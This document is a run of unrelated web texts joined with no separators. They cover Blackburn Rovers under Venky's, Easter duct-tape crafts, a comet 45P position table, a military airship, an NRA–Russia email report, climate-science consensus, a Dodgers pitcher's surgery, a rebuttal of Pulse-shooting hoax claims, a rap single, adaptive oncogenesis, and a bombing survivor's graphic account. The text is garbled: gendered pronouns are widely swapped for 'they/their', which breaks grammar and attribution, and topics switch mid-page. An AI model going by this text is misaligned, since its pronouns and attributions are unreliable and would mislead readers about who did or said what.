They talked up Blackburn's chances of signing Brazilian forward Ronaldinho from AC Milan and even floated the prospect of luring David Beckham to Ewood Park from LA Galaxy, yet instead ended up completing a free transfer deal for Aberdeen reserve Myles Anderson — son of football agent Jerome — and described them as a new Chris Smalling.
Kean enjoys giving their underwhelming signings a lofty billing. They compared Mauro Formica to Gabriel Batistuta and suggested that they had signed a 'young Wayne Rooney' after completing a £2 million deal for Dundee United's David Goodwillie. Neither has lived up to the hype.
Kean's appetite for the surreal has done little to help their cause with the Blackburn supporters, who memorably shipped a 'Kean Out' banner to Pune before having it unfurled by local fans during the club's friendly in India earlier this season. When Phil Jones left Blackburn for Manchester United last summer, Kean admitted, with a straight face, that the player ''wanted Champions League football and we're not at that moment where we can offer them that yet''. Who knows how long they would have waited for Venky's and Kean to bring Champions League football back to Ewood Park?
Instead of Real Madrid and Barcelona, it will be Bristol City and Brighton on the fixture list next season, but the concern for a club once regarded as one of the best-run in the country now centres on how bleak the picture might become.
Will Venky's possess the appetite to invest the sums required to make Blackburn competitive in the Championship? As it stands, Kean's team does not have the look of an outfit likely to push for promotion. And if Venky's decide that their investment has been waste of time and money, what happens next?
The previous owners spent almost a decade looking for somebody else to run the show and they ended up with Venky's, so who will show an interest in buying a Championship club with a proud history, but dwindling fan-base?
The nightmare scenario for the more pessimistic Rovers supporters is that the club will now go into financial meltdown and suffer a similar fate to Bradford City, who were left to spiral from the top flight to the basement division in the space of six years following relegation from the Premier League in 2001.
Sources at Blackburn suggest that the picture is not quite so bad at this stage, but there is concern over the absence of a tangible plan of action for life outside the top flight.
When dawn breaks, Venky's will have to get to work quickly on that, otherwise their big investment will fall even further through the floor.
By Starr Durrant
These fun and easy duct tape decorating ideas are great for all ages and skill levels! Look for the Easter themed Duct Tape at your local craft or dollar store and go bunnyanas!
This slideshow requires JavaScript.
Using the Easter duct tape, it's fun and easy to decorate a vase, candle or candy dish and by adding some ribbon or embellishments you can get creative and make it your own. These are just some ideas but you could decorate napkin holders, salt & pepper shakers, picture frames, and so much more! I found two different patterns of Easter tape that appealed to me but there are lots of different designs to choose from.
Happy Easter!
Also Visit My Other Easter Blogs
DIY Duct Tape Easter Bows
Easter Lily Fairy 2015
Easter Egg Secrets – How to Remove Whites and Yolk Without Cracking Egg
How to see comet 45P/Honda-Mrkos-Pajdusakova in the February morning sky. Will pass close by Earth on the 11th.
At the start of the year, periodic comet 45P/Honda-Mrkos-Pajdusakova was visible as an early evening object, low down at dusk above the western horizon. During February, it re-emerges in the morning sky and this time is much better placed for northern-based observers.
The comet is visible from about February 4th as it moves swiftly northwards. It starts the month in Aquila, then passes through Hercules, Corona Borealis, Boötes, Canes Venatici, Coma Berenices, Ursa Major and finally ends the month in Leo. The rapid movement results from its close proximity to Earth. On February 11th, it passes the Earth at just 0.0843 AU, equal to 12.6 million kilometres or 7.8 million miles. It could then be as bright as mag. +6.2 and easily within binocular range. Unfortunately, the Moon will be full on the day of the closest approach, although it's located in the opposite part of the sky. From northern latitudes, 45P will be well placed high towards the east before sunrise. After "swinging" by Earth it then rapidly fades in brightness. The comet is also visible from southern latitudes, but appears much lower down.
The charts below show the position of 45P between February 4th and 16th, 2017.
Positions of comet 45P/Honda-Mrkos-Pajdusakova from February 4th to 9th - pdf format (credit:- freestarcharts)
Positions of comet 45P/Honda-Mrkos-Pajdusakova from February 9th to 12th - pdf format (credit:- freestarcharts)
Positions of comet 45P/Honda-Mrkos-Pajdusakova from February 12th to 16th - pdf format (credit:- freestarcharts)
45P/Honda-Mrkos-Pajdusakova data (at epoch January 7, 2017)
Name 45P/Honda-Mrkos-Pajdusakova Type Comet Discoverer Minoru Honda Discovery date December 3, 1948 Perihelion 0.5296 Aphelion 5.511 Semi-major axis (AU) 3.0205 Eccentricity 0.8246 Orbital period 5.25 Inclination (degrees) 4.257 Perihelion December 31, 2016
45P/Honda-Mrkos-Pajdusakova Data Table
Date Right Ascension Declination Mag. Distance from Earth (AU) Constellation 01-Jan-2017 20h 59m 25s -18d 50m 36s 6.8 0.694 Capricornus 02-Jan-2017 21h 01m 31s -18d 34m 31s 6.8 0.672 Capricornus 03-Jan-2017 21h 03m 27s -18d 18m 19s 6.7 0.651 Capricornus 04-Jan-2017 21h 05m 13s -18d 02m 01s 6.7 0.629 Capricornus 05-Jan-2017 21h 06m 48s -17d 45m 37s 6.6 0.608 Capricornus 06-Jan-2017 21h 08m 11s -17d 29m 06s 6.6 0.587 Capricornus 07-Jan-2017 21h 09m 24s -17d 12m 29s 6.5 0.567 Capricornus 08-Jan-2017 21h 10m 24s -16d 55m 43s 6.5 0.546 Capricornus 09-Jan-2017 21h 11m 12s -16d 38m 47s 6.5 0.526 Capricornus 10-Jan-2017 21h 11m 47s -16d 21m 38s 6.4 0.506 Capricornus 11-Jan-2017 21h 12m 10s -16d 04m 13s 6.4 0.487 Capricornus 12-Jan-2017 21h 12m 21s -15d 46m 29s 6.4 0.468 Capricornus 13-Jan-2017 21h 12m 18s -15d 28m 21s 6.5 0.449 Capricornus 14-Jan-2017 21h 12m 01s -15d 09m 43s 6.5 0.431 Capricornus 15-Jan-2017 21h 11m 32s -14d 50m 31s 6.5 0.413 Capricornus 16-Jan-2017 21h 10m 48s -14d 30m 36s 6.5 0.396 Capricornus 17-Jan-2017 21h 09m 50s -14d 09m 51s 6.5 0.378 Aquarius 18-Jan-2017 21h 08m 37s -13d 48m 08s 6.5 0.362 Aquarius 19-Jan-2017 21h 07m 09s -13d 25m 15s 6.6 0.345 Aquarius 20-Jan-2017 21h 05m 25s -13d 01m 01s 6.6 0.329 Aquarius 21-Jan-2017 21h 03m 24s -12d 35m 12s 6.6 0.313 Aquarius 22-Jan-2017 21h 01m 04s -12d 07m 32s 6.6 0.298 Aquarius 23-Jan-2017 20h 58m 26s -11d 37m 42s 6.6 0.283 Aquarius 24-Jan-2017 20h 55m 26s -11d 05m 21s 6.7 0.268 Aquarius 25-Jan-2017 20h 52m 04s -10d 30m 02s 6.7 0.254 Aquarius 26-Jan-2017 20h 48m 15s -09d 51m 16s 6.7 0.239 Aquarius 27-Jan-2017 20h 43m 59s -09d 08m 25s 6.7 0.226 Aquarius 28-Jan-2017 20h 39m 09s -08d 20m 45s 6.8 0.212 Aquarius 29-Jan-2017 20h 33m 43s -07d 27m 23s 6.8 0.199 Aquila 30-Jan-2017 20h 27m 34s -06d 27m 14s 6.8 0.186 Aquila 31-Jan-2017 20h 20m 35s -05d 18m 58s 6.8 0.174 Aquila 01-Feb-2017 20h 12m 36s -04d 01m 01s 6.8 0.162 Aquila 02-Feb-2017 20h 03m 27s -02d 31m 24s 6.8 0.150 Aquila 03-Feb-2017 19h 52m 53s -00d 47m 52s 6.7 0.139 Aquila 04-Feb-2017 19h 40m 37s 01d 12m 15s 6.7 0.128 Aquila 05-Feb-2017 19h 26m 17s 03d 31m 49s 6.6 0.118 Aquila 06-Feb-2017 19h 09m 27s 06d 13m 31s 6.5 0.109 Aquila 07-Feb-2017 18h 49m 37s 09d 19m 08s 6.4 0.101 Aquila 08-Feb-2017 18h 26m 16s 12d 48m 06s 6.3 0.094 Hercules 09-Feb-2017 17h 58m 58s 16d 35m 36s 6.2 0.089 Hercules 10-Feb-2017 17h 27m 34s 20d 30m 41s 6.2 0.085 Hercules 11-Feb-2017 16h 52m 27s 24d 16m 15s 6.2 0.083 Hercules 12-Feb-2017 16h 14m 43s 27d 32m 44s 6.2 0.084 Corona Borealis 13-Feb-2017 15h 36m 12s 30d 04m 43s 6.3 0.086 Corona Borealis 14-Feb-2017 14h 58m 55s 31d 46m 26s 6.4 0.090 Boötes 15-Feb-2017 14h 24m 33s 32d 41m 58s 6.6 0.096 Boötes 16-Feb-2017 13h 54m 04s 33d 01m 15s 6.8 0.103 Canes Venatici 17-Feb-2017 13h 27m 42s 32d 55m 21s 7.0 0.112 Canes Venatici 18-Feb-2017 13h 05m 11s 32d 33m 38s 7.2 0.121 Canes Venatici 19-Feb-2017 12h 46m 05s 32d 02m 57s 7.4 0.131 Canes Venatici 20-Feb-2017 12h 29m 52s 31d 27m 51s 7.7 0.141 Canes Venatici 21-Feb-2017 12h 16m 03s 30d 51m 10s 8.0 0.152 Coma Berenices 22-Feb-2017 12h 04m 12s 30d 14m 36s 8.3 0.164 Ursa Major 23-Feb-2017 11h 53m 59s 29d 39m 07s 8.6 0.176 Ursa Major 24-Feb-2017 11h 45m 07s 29d 05m 10s 8.9 0.188 Ursa Major 25-Feb-2017 11h 37m 22s 28d 32m 58s 9.4 0.200 Ursa Major 26-Feb-2017 11h 30m 33s 28d 02m 36s 9.7 0.213 Leo 27-Feb-2017 11h 24m 32s 27d 33m 59s 10.0 0.226 Leo 28-Feb-2017 11h 19m 11s 27d 07m 02s 10.6 0.239 Leo
See also
Now is the last good chance to see comet 45P/Honda-Mrkos-Pajdusakova before it dramatically fades
Comet 45P/Honda-Mrkos-Pajdusakova now visible with small telescopes
It can't go faster than 34MPH and it's already a year late for its planned deployment in Afghanistan, but Northrop Grumman's Long Endurance Multi-Intelligence Vehicle (LEMV) is now set for its maiden flight. The test run is scheduled for sometime between June 6th and 10th over Lakehurst, New Jersey, whose residents ought to be forewarned that it is not a solar eclipse or a Death Star, but simply a helium-filled pilotless reconnaissance and communications airship that happens to be the size of a football field. After floating around for a while, the giant dirigible is expected to journey south to Florida, where it'll be fitted to a custom-built gondola that will carry the bulk of its equipment, and by which time their enemies hopefully won't have come into possession of an air force.
An email turned over to Capitol Hill investigators and described to the New York Times provides evidence that Russia sought to build a relationship with the Trump campaign and suggests that the National Rifle Association (NRA) sought to serve as a liaison to establish a “Kremlin Connection,” according to a Times' report on Sunday.
In May of 2016, an NRA member by the name of Paul Erickson reportedly reached out to Trump campaign adviser Rick Dearborn, seeking advice from both Dearborn and then-Sen. Jeff Sessions (R-AL) about how to connect then-candidate Donald Trump and Russian President Vladimir Putin. The email stated that Russia was “quietly but actively seeking a dialogue with the U.S.” and would attempt to make “first contact” at the NRA's national convention that month via Alexander Torshin, a deputy governor of the Russian central bank with close ties to Putin. As the Times notes, that was not the only overture Russian officials made to the Trump campaign around that time.
“Putin is deadly serious about building a good relationship with Mr. Trump,” Erickson said in the email. “He wants to extend an invitation to Mr. Trump to visit them in the Kremlin before the election. Let's talk through what has transpired and Senator Sessions's advice on how to proceed.” Erickson claimed the reach of the NRA had put them in a position to “slowly begin cultivating a back-channel to President Putin's Kremlin.”
As ThinkProgress reported last year, the NRA has been cultivating ties with Russia for several years, primarily through a group called The Right to Bear Arms, which is essentially the NRA's Russian counterpart. Torshin, who is also an NRA life member, was considered an honorary member of the Russian group, and spoke at a welcome reception when it hosted a delegation of NRA leaders in late 2015.
Advertisement
The budding relationship between the NRA and its Russian counterpart may, for example, explain why the NRA criticized the Obama administration over sanctions against Russia in 2014. Just a few weeks after that statement was issued, The Right To Bear Arms hosted Erickson, also a “life member,” for an open meeting in Moscow. Less than two years later, Erickson was emailing the Trump campaign to establish contact with Torshin.
According to the Times, neither Trump nor their campaign officials attended the dinner where Torshin planned to establish that “Kremlin connection,” (the email's subject line), but Donald Trump, Jr. and Torshin attended a separate NRA dinner that same night.
Sessions reportedly told the House Intelligence Committee that they did not recall the outreach. Dearborn likewise did not respond to the Times' requests for comment, and White House attorney Ty Cobb declined to comment on behalf of the administration.
Was there a definitive moment when the scientific community reached a consensus about climate change?More in our defining moments in climate change series
Climate scientists are canaries in the coalmine - highly attuned to sense danger before we blunder into it. For decades, various researchers have issued calamitous warnings about climate change. But was there a moment when science collectively, definitively, dropped off the perch?
During the 1990s, scientists were still debating the most basic assertions of climate change science. Was the world indeed warming? Consensus was growing, but slowly and many scientists remained undecided.
Two bold scientific statements bookended the decade – James Hansen's statement to the US senate in 1988 and the 1999 hockey stick graph. Maligned and celebrated, the two were influential in bringing climate change into the public consciousness. Yet both were accused of using unproven methods to reach their conclusions, damaging the credibility of climate science and paving an easy road for denialism.
Hansen, head of Nasa's Goddard Institute for Space Studies, told the energy and natural resources committee of the United States Senate in 1988 that their research on human-induced global warming was unequivocal. "The greenhouse effect has been detected, and it is changing our climate now."
The next day, the New York Times ran the headline "Global Warming Has Begun". It was a galvanising moment for public opinion and Hansen became a poster boy for the environment movement, but not all were convinced.
"Hansen was a scientist that bumped right up against the edge of activism and a lot of scientists have been very uncomfortable going over into that. And rightly so ... if you're seen too much as an activist then people won't trust your science," said Marshall Shepherd, 2013 president of American Meteorological Society.
The US National Climate Assessment (NCA), released last week, echoed Hansen's words 26 years later: "Climate change is already affecting the American people".
But even the NCA, built as it was on the work of 800 scientists, has been criticised for a lack of nuances.To maintain credibility, climate science must walk the narrow ledge between conservatism and activism.
Some scientists feel the hockey stick graph, published in 1999, dangled both feet over this edge. Michael Mann, Raymond Bradley and Malcolm Hughes used data gathered from tree rings, lake sediments, ice cores and corals to recreate the global temperature over the past 1,000 years. The image they produced was a startling visual communiqué of the world's post-industrial warming trend. It was featured prominently in the Intergovernmental Panel on Climate Change's (IPCC) 2001 report.
But Mann et al's willingness to use unproven methodology irked some scientists, including Hulme: "I don't think it was seminal for scientists. To me that was never a decisive interventional piece of evidence. The data was absolutely scanty."
Shepherd disagrees. "I think it would be characterised as a watershed moment in climate science," they say, although they recognise it as "one of the singular most polarising graphs or scientific pieces of data that exist".
The problem for Mann and Hansen is the world wants to see all the canaries keeling over together, a clear public moment of unequivocal proof. Shepherd says the public wrongly see science like a court case, in which reasonable doubt can outweigh a larger body of evidence. But science has a natural indifference to the desire for certainty. Each time a scientist gets too far ahead of the curve it makes the scientific community deeply uncomfortable. Disagreements of this kind can be latched onto as evidence that the scientific process is flawed, fuelling the denial movement.
Consensus on climate change built incrementally through the 1990s until, by the time the 2001 IPCC report came out (with the hockey stick graph in it), there were very few scientists who felt uncomfortable attributing some climate change to human activity.
But Hulme says there was no collective eureka moment and there will always be doubt and questions. "Science doesn't really do that. It is always an unending process of confirmation, correction, refutation … It is the collective social practice of science that in the end gives science its particular credibility and status. But it's a rather harder thing to get to the bottom of because you can't just focus on one charismatic individual."
Notably absent from the consensus building of the 1990s were the voices of climate scientists from developing countries, says Chandra Bhushan, deputy director of the Centre for Science and Environment in Delhi. For the most part, this was because the research was simply not happening. But increased interest from political leaders during this time led some countries (mainly in the Indian subcontinent, China and southeast Asia) to implement climate science programmes. Even so, the imbalance perpetuates today.
Bhushan says climate scientists from the south "still play a very little role in developing consensus on climate change negotiations." The latest IPCC report drew more than 90% of its research material from developed countries.
Scientists participate in the compiling of IPCC reports with funding from their governments, meaning wealthy countries can afford to participate more in the process. This has the effect, Bushan argues, of politicising the reports, which they say have focussed unduly on the impacts of climate change on the developed world.
Read more stories like this:
• Defining moments in climate change: hope and crisis in Copenhagen
• The first climate justice summit: a pie in the face for the global north
• Typhoon Haiyan was just the start – prepare for an ever stormier future
Join the community of global development professionals and experts. Become a GDPN member to get more stories like this direct to your inbox
Dodgers left-hander Hyun-jin Ryu underwent shoulder surgery today that revealed damage in their labrum, manager Don Mattingly told reporters, including J.P. Hoornstra of the L.A. News Group (Twitter link). The labral repair surgery will end Ryu's 2015 season without throwing a pitch, though Mattingly told reporters that the team's expectation is that Ryu will be ready to pitch in Spring Training 2016.
The 28-year-old Ryu is earning $4MM in 2015 — the third season of a six-year, $36MM contract signed in the 2012-13 offseason. He'll join right-hander Brandon McCarthy on the shelf for the duration of the season, leaving the Dodgers with just 60 percent of their projected rotation available for the rest of the year on May 21.
Clayton Kershaw, Zack Greinke and Brett Anderson will front the rotation moving forward, but Anderson's injury history is among the lengthiest of any active pitcher in the league, so the Dodgers have to be at least somewhat concerned with their rotation depth moving forward. To this point, both Mike Bolsinger and Carlos Frias have pitched well as substitutes, but neither has any sort of track record in the Major Leagues.
Ryu projected as the Dodgers' No. 3 starter this season after adjusting from the Korea Baseball Organization to Major League Baseball quite well from 2013-14. In those two seasons, Ryu worked to a combined 3.17 ERA with 7.7 K/9, 2.0 BB/9 and a 49.2 percent ground-ball rate. However, they failed to reach 200 frames in either of those campaigns, and they bothered by shoulder troubles in 2014, spending time on the 15-day DL early in the season and seeing their season end on Sept. 12 due to shoulder fatigue.
The Dodgers have a rich farm system that should afford them the ability to trade for rotation help if they see fit. Given the fact that the only starters who are guaranteed to return in 2016 are Kershaw, Ryu and McCarthy — Anderson is on a one-year deal, whereas Greinke has the ability to opt out of their contract's remaining three years after the season — Los Angeles could is a speculative fit not only for rental pitchers such as Scott Kazmir, but for longer-term assets like Cole Hamels (if, of course, it is determined that trades are the best route).
The Dodgers have steadfastly refused to include Corey Seager, Julio Urias or breakout rookie Joc Pederson in trades to this point, and I'd imagine that will continue to be the case as the July 31 non-waiver trade deadline approaches. Nonetheless, the team has enough depth in the farm system that it will have a number of realistic targets to explore if president of baseball operations Andrew Friedman, GM Farhan Zaidi and VP Josh Byrnes elect to engage other clubs in trade talks.
The Latest Pulse Tragedy: The Claim It Was All a Hoax
The morning after the Pulse attack in Orlando, Christine Leinonen still didn't know their son was among the dead. They walked the streets with pictures, begged national news shows to let them appear and tell them story. When they finally heard their only child, Christopher “Drew” Leinonen, had been killed along with their boyfriend, Juan Guerrero, it set their life permanently in a new direction. But to this day, a number of people online still believe she's lying about the whole thing.
“My son's murder and my subsequent interviews were labeled hoaxes even before I found out that my son had been in fact killed and I was still desperately trying to find him,” Leinonen wrote on Facebook last week. “Just one of the many hoax videos of me got a million views. The interest to try to believe the shooting didn't occur was greater than knowing the truth.”
Like many national tragedies before it — the Sandy Hook shooting, the killings of WDBJ television journalists, the 9/11 terrorist attacks — a community of like-minded conspiracy theorists seemingly rose from nowhere to call the whole thing a hoax. And I can verify that in this instance, the wackos wasted no time.
Six months ago today, I showed up at Pulse to cover the tragedy for The Advocate. The first thing I encountered when I arrived outside the media staging area was a man waving a “False Flag” sign made from cardboard. At this point, we knew little in way of details. Not a single casualty had been identified besides shooter Omar Mateen. Authorities released details every few hours, the sort of slow trickle you expect at an active crime scene with investigators still at work. By this point, several blocks surrounding Pulse had been closed to the public. Businesses located near the club couldn't open that morning, and media still weren't allowed near the hospital where many wounded received medical treatment. Of course, the man with the sign could see most of this with their own two eyes yet still waved the placard defiantly, believing their presence would alert somebody of an elusive “truth.”
(RELATED: Scenes of Real Tragedy That Prove Pulse Was No Hoax)
Searching through YouTube, it's not hard to find videos “explaining” the rampant use of “crisis actors” by the federal government. The story goes, as it always does, that these folks get hired Wag the Dog-style to enact tragic events. The reason? That's up to you, but some nefarious motive always explains away the lapses in logic. Usually the top levels of the federal government will be micromanaging these affairs for the sake of some policy breakthrough like gun control. But why would President Obama, Sen. Marco Rubio, and Florida Gov. Rick Scott join forces when the latter have (successfully) opposed such reforms? Antiterrorism dollars? Who knows. No unholy marriage of agendas explains this elaborate a hoax. But then maybe I'm just a part of the grand conspiracy or such a rube that I'm easily fooled.
Many Pulse conspiracies revolve around Christopher Hansen, a man who got out of the club early and can be seen on local news footage helping carry people out. Hansen wore an American flag shirt and a recognizable fedora. Folks note Hansen's clothes are not covered in blood, which is consistent with the fact they aren't shot and only helped move people who had been cleaned up by paramedics. YouTube videos debate whether Hansen could actually be local actor Bjorn Jiskoot, a man who on Facebook reveals they have been harassed because of the resemblance. It seems important to some to allege Jiskoot isn't even gay, so Hansen must be pretending to be. Why else would a straight actor be in a gay club using a fake identity? Every snag in theory only serves as evidence of a cover-up in certain quarters.
I have interviewed Hansen several times over the course of the last few months. The first time was shortly after the shooting. Because they were a native English speaker willing to get on camera, media flocked to them when they returned to Pulse a day after the attack to retrieve a car still trapped behind crime scene tape. I sat down with them in a Jason's Deli when they went over the events of the club for perhaps the hundredth time. He'd already become aware that conspiracy nuts pegged them as an actor.
If so, he's a committed one. I spoke to Hansen more recently at Orlando Come Out With Pride, where he'd been invited to march with other Pulse survivors. Their hair dyed glittering purple, they obviously are in much better spirits. With stories of attending the Out 100 party in New York with their father, with whom they have only grown closer since a near-brush with death, Hansen has become much more entrenched in the community since the attack, with folks from many walks of life greeting them in Orlando's streets. But the hoax accusations continue. They understand the woman they helped carry on that famous news clip has been additionally traumatized by online “exposés” that “prove” they were just a mannequin.
Ever since the election of Donald Trump, who benefited from a difficult-to-tabulate assist from fringe conspiracy sites like Alex Jones's InfoWars, “fake news” has become a topic du jour for bantering pundits. But we should remember this news damages more than our discourse. This faux journalism damages real people's lives. Leinonen suffers daily from the loss of their child. Hansen still gets triggered by fireworks displays at Walt Disney World. And on top of it all, these people get hurt in meaningful ways by dubious reporting, especially the kind that questions the genuine tragedy they already suffered. If they get forgotten, the true cost of “fake news” will have been forgotten altogether, and their pain and loss, their heroism and activism, will be one more casualty of an already cruel attack.
Who would have known that mere months after debuting on The Booth with Living Wrong, that The O'My's would hit us with a record that boast a Who's Who is a arsenal of Midwest spitters? Well, the self-proclaimed "scoundrels and hooligans" of the Windy City have done just that with their brand-new single, Bout A Dolla. Featuring a guest list the size of a Diddy birthday party, Dolla is blessed with verses from Chuck Inglish, Chip Tha Ripper, Chance The Rapper, and lastly Twista, who concludes the song with their signature tongue-twisting style. Despite the onslaught of emcees on the record The O'My's manage to keep Bout A Dolla heavy on the soul thanks to Maceo's rich vocals and Blended Babies' strings-heavy production. As of now Bout A Dolla is not attached to any project from The O'My's, but knowing the music industry that could change at any minute.
ADVERTISEMENT Thanks for watching! Visit Website
ADVERTISEMENT Thanks for watching! Visit Website
For organismal evolution, natural selection works on heritable diversity, and major periods of speciation (such as the Cambrian Explosion) were likely due to altered environmental selection pressures rather than increases in mutation rates. Analogously, numerous investigators have stressed the importance of the microenvironment in cancer development and the critical role of altered selection.21, 22, 44, 45, 46, 47, 48, 49 Dramatic changes in tissue microenvironments occur with age, including stromal changes and increased inflammation.50, 51 These age-dependent changes should substantially alter adaptive landscapes (relationships between genotype and cellular fitness; Box 1), which describe how mutational changes can be adaptive, maladaptive or neutral in a context-dependent fashion. Alterations in adaptive landscapes in old age should promote selection for particular oncogenic mutations from within the standing genetic/epigenetic variation (Figure 2), whether it arose from endogenous (oxidative damage, replicative errors, and so on) or exogenous (exposure to environmental carcinogens) insults. Indeed, recent studies indicate that the frequency of cells with clonally-expanded genomic rearrangements increases substantially after 50–60 years of age in humans, correlating with cancer risk, which could reflect alterations in the adaptive landscape, increased rates of genomic alterations and/or decreased stem cell polyclonality.52, 53, 54 Notably, in another study, five of the six detected clonally-expanded chromosomal abnormalities were present in both bladder and blood, suggesting an early embryonic origin of the events.55 Mutations that arise during ontogeny (or anytime after) but were neither adaptive nor maladaptive at the time may be adaptive in the new landscape, thereby conferring a selective advantage and promoting clonal expansion.36, 48 Context-dependent selection leading to expansion of the oncogenically mutated clone would then greatly increase the likelihood of acquisition of secondary oncogenic mutations in cells that harbor an initiating lesion. Moreover, some of these oncogenic events selected for by the age- or carcinogen-altered adaptive landscapes could then contribute to increased genomic instability, providing more fuel for selection to act upon. While new mutations that accumulate with age should increase the cellular variation subject to selection, this alternative model does not depend on age-dependent accumulation of mutations to explain increased cancer incidence in old age.
Figure 2 Selection-centric model. This model posits that aging is largely associated with cancer due to alterations in selection for oncogenic mutations. The weight of the arrow reflects the proposed contribution to cancer incidence. Full size image
To understand cancer evolution, we should consider why large and long-lived multicellular organisms like ourselves are so good at not getting cancer.36 For example, what tumor-suppressive mechanism could allow for mammals as diverse as mice and blue whales to largely avoid cancer through their reproductive years (Peto's Paradox)? As argued above, the commonly accepted view that cancer incidence is rate-limited by the occurrence of oncogenic mutations does not appear to be consistent with the common presence of oncogenic mutations in normal tissues, with the most rapid accumulation of mutations during ontogeny, and with the lack of reductions in somatic mutation rates during the evolution of complex multicellularity. We have proposed that cancer avoidance through reproductive years is dependent on the same basic principle that governs the avoidance of other hallmarks of aging: investments are made in tissue maintenance to the extent that provides the best return in terms of reproductive success. Thus, we have argued that the maintenance of tissue stem and progenitor cell fitness is inherently tumor suppressive, as high cellular fitness should disfavor selection for phenotype-altering somatic mutations (see DeGregori36 and Marusyk and DeGregori48 for a full description of this ‘Adaptive Oncogenesis' model). Of course, other mechanisms, such as alterations in how telomeres are maintained,56, 57 could also contribute to similar tumor suppression through reproductive years for species with hugely different sizes and lifespans.
If we again consider HSC, given that hematopoietic malignancies are common in mice and that HSC are the best-characterized stem cells, it is striking that mutations defined as oncogenic (activation of an oncogenic pathway, either by tumor suppressor gene deletion or by oncogene expression) typically exhibit a common phenotype in HSC: loss of self-renewal (Table 1). For this table, I have assembled all published reports that I could find that describe oncogenic mutations engineered in mouse HSC under reasonably physiological contexts (that is, in young unperturbed bone marrow at steady state). It is notable that even mutations, such as in PTEN,58, 59 which increase proliferation (leading to initial expansion of short-term progenitors), impair HSC maintenance. In fact, a common effect of oncogenic mutations in HSC is to increase cell cycling,60 which likely contributes to loss of self-renewal: HSC maintenance necessitates an appropriate level of quiescence. Thus, we would expect that these mutations, should they occur in an individual HSC, would lead to clonal exhaustion by differentiation. Finally, it is notable that many of these mutations have been shown to be advantageous in vitro. For example, β-catenin activation increases HSC self-renewal and expansion in vitro.61 Animals did not evolve stem cells that would be well adapted to in vitro culture, and certain oncogenic events can be adaptive under such stressful conditions. The studies summarized in Table 1 provide support for the model that stem cells occupy a local fitness peak on the adaptive landscape, such that changes in phenotypic parameters will be rarely advantageous and typically disadvantageous (Figure 3).
Table 1: Oncogenic mutations typically impair HSC maintenance Full size table
Figure 3 The Goldilocks Rule for stem cells. (a) Young healthy stem cells are proposed to possess parameters (cell cycle, differentiation, interactions with the niche, etc.) that are near optimal (‘just right') for maintenance as a stem cell. Stem cells are presumed to occupy a local fitness peak on the adaptive landscape; cancer cells in the same tissue could occupy a higher peak, but transitions to this peak would require passage through lower fitness states on the landscape (see DeGregori36). Thus, acquisition of a single oncogenic mutation would typically be disadvantageous, by changing parameters from their optimum (see Table 1). (b) For old or damaged stem cells, parameters are suboptimal or abnormal, and the stem cells no longer possess optimal or near optimal fitness. Changes in parameters could result from both cell-autonomous events (damage to the stem cells) or from non-cell-autonomous changes (such as degradation of the niche or systemic changes). These changes in the stem cell pool can lead to selection for oncogenic events that are adaptive to this context. Full size image
While the Adaptive Oncogenesis model posits that oncogenic mutations should rarely be advantageous within young, fit stem cell pools, there are potential exceptions. First, c-CBL−/− mice exhibit increased numbers of HSC, and these HSC exhibit increased cycling and greater reconstitution potential in competitive bone marrow transplantation experiments62 (Table 1). C-CBL is an E3 ligase that downregulates tyrosine kinase signaling. Gain-of-function mutations and translocation of c-CBL are implicated in several cancers including myeloid neoplasms,63, 64 and c-CBL−/− mice exhibit tissue hyperplasia.65 It will be interesting to determine if mutation of c-Cbl in an isolated HSC indeed proves advantageous in a young healthy mouse (as opposed to a mouse deficient in c-CBL in all tissues). Second, the induction of a KRASG12D mutation in mice leads to competitive expansion of the hematopoietic clones (including HSC) expressing activated K-Ras, despite a dramatic loss of functional HSC numbers.66 As noted by the authors, conditional activation of KRASG12D occurs in many (if not all) tissues, and thus K-RasG12D expression in non-hematopoietic tissues could alter the microenvironment for HSC (and thus the adaptive landscape), which could also explain the reductions in HSC numbers. Another possible exception is for Bcr–Abl. Reynaud et al. showed that activation of Bcr–Abl expression in unperturbed mice results in reduced HSC numbers, apparently by increased differentiation to more committed myeloid progenitors,67 which nicely supports our model that young unperturbed HSC favor the status quo (the youthful phenotype). These results are also consistent with previous studies which indicate that Bcr–Abl promotes differentiation of human HSC, inhibiting self-renewal,68, 69 and that selection for Bcr–Abl is context dependent.32, 70 However, in the Reynaud et al. study, following transplantation into irradiated recipient mice, Bcr–Abl provides a competitive advantage to HSC.67 Irradiation clearly alters the bone marrow microenvironment (and thus the stem cell niche), which could impact upon the adaptive landscape and promote selection for Bcr–Abl mutation. Of course, the alternative explanation is that some oncogenic mutations can be advantageous even in young healthy HSC pools, and it is the small size of this stem cell pool (together with other hurdles to tumorigenesis, such as the need for multiple oncogenic mutations) combined with the inability of these oncogenes to initiate cancer in more committed hematopoietic progenitors that sufficiently limits leukemias initiated by these oncogenes until older ages.
Just as high cellular fitness should prevent the fixation of phenotype-altering mutations, the converse should also be true: reductions in progenitor cell fitness with aging or other insults should increase selection for oncogenic mutations adaptive to the particular context (Figure 3). For example, while INK4A (encodes the p16 cyclin-dependent kinase inhibitor) mutation reduces the self-renewal of young HSC (Table 1), p16 loss actually increases the self-renewal of old HSC (which exhibit self-renewal defects),71 and thus we would expect that p16 loss would be adaptive in old HSC pools. Similarly, while loss of p53 does not provide an advantage within young healthy hematopoietic pools, p53 mutation is potently selected for within HSC and more committed progenitor pools following irradiation of mice.72, 73 Finally, we have shown that Bcr–Abl is adaptive in old hematopoietic progenitor pools, but not young, by restoring kinase signaling pathways that are reduced in old progenitors.32 Thus, just as maintenance of fit stem cell pools should be tumor suppressive by disfavoring phenotype-altering mutations, reductions in the fitness of stem cell pools (such as during aging or following irradiation) should increase selection for particular oncogenic mutations adaptive to the altered context.
Everything went mute. To this day, I don't know if I lost consciousness. All I know is that I had flown some distance in the air, and everywhere I looked there were dead bodies. It seemed that every single person in that line had been murdered except for me. Liana died on the spot. A total of 21 people were killed, 16 of them were teenagers.
There was blood on me, but I didn't feel any pain and didn't know whom the blood belonged to. My only thought was that I had to find my phone to call my mom. The battery had been dislodged, and I somehow managed to put it back into the phone.
All of a sudden, I felt very, very cold. I put my hand on my neck and three of my fingers went deep inside my throat. Four steel balls — the kind that are inside pinball machines — had torn into my flesh. That's when I started to panic.
Somehow, I don't know how, I crawled on my stomach toward a “makolet” (bodega). I will never forget the dead girl on the ground near the store. They were wearing a silver dress and had shoulder-length blond hair. There wasn't a scratch on them It looked as though they had had a heart attack. Or had simply fallen out of the sky.
